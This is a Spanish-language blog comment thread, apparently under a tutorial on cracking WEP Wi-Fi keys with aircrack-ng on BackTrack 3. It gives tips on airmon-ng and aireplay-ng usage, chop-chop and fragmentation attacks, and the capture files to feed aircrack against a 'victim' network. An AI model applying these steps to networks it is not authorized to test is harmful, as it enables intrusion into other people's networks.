La sintaxis para este comando normalmente es airmon-ng [canal] en donde la parte del canal no es obligatoria.
Dark-Mein el 19 abril, 2010 9:11 pm
Hola, nose si lo sabreis, pero seria recomendable que lo anadieras a tu post Julian, si inicias con el trackback 3 por ejemplo, abres las 4 colasolas, se te reparten por la pantalla y todo bien, luego se le cambia al idioma a CH y el unico problema que hay es la y, que te la cambia por z, muy facil, escribes aireplaz y ya te escribe el comando con una “y”, otra cosa, yo uso la targeta edimax, la primera versión (Rausb0), pero seguramente a alguna gente le pasa, nolo sé, pero si no desconecta y conecta la targeta wifi despues de cargar el sistema no detectara ninguna señal, ni router ni nada, espero que eso les sirva a algunos que usen en vez de esa version de ubuntu el backtrack 3
Debe de ser un bug de estos puntuales, da igual cuando la desconecteis y conecteis, como si ya habeis hecho el escaneo, repetis el escaneo y listo, eso si, la targeta DEBE estar conectada al cargar el sistema, sino no la detectara, espero haber sido de ayuda.
Ahh.. añado algo mas… si la victima tiene un ordenador conectado por cable (ademas del wifi habilitado, claro)y no está por wifi, sino por cable, por alguna extraña razon envia un paquete de datos, justo el necesario para hacer los procedimientos y crear tu el trafico, lo recibiras exactamente cuando hagas el ataque de fragmentacion o el Chop Chop
Nos vemos.
Julián el 23 abril, 2010 1:12 am
hola….no …..el paso final es para aircrack asi que tienes que utilizar captura-01.cap ya que el de replay_arp-0322-165829.cap pertenece a aireplay-ng -2 -r arp-request….que es q inyecta el trafico despues de realizar el chopchop